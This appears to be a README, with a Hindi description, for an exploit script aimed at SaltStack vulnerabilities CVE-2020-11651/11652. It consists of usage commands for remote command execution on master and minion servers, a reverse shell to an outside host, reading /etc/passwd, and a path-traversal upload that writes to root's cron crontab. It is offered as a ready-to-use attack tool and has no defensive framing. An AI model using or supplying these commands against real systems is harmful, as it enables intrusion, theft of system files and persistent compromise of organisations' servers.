
SaltStack CVEs (CVE-2020-11651/11652) के लिए एक्सप्लॉइट जो मास्टर/मिनियन पर रिमोट कमांड निष्पादन, फ़ाइल पढ़ने/अपलोड करने और रिवर्स शेल सक्षम करता है।
CVE-2020-11651 CVE-2020-11652
python exp.py --exec-choose master --exec-cmd "whoami"
python exp.py --exec-choose minions --exec-cmd "whoami"
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444
python exp.py --read /etc/passwd
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"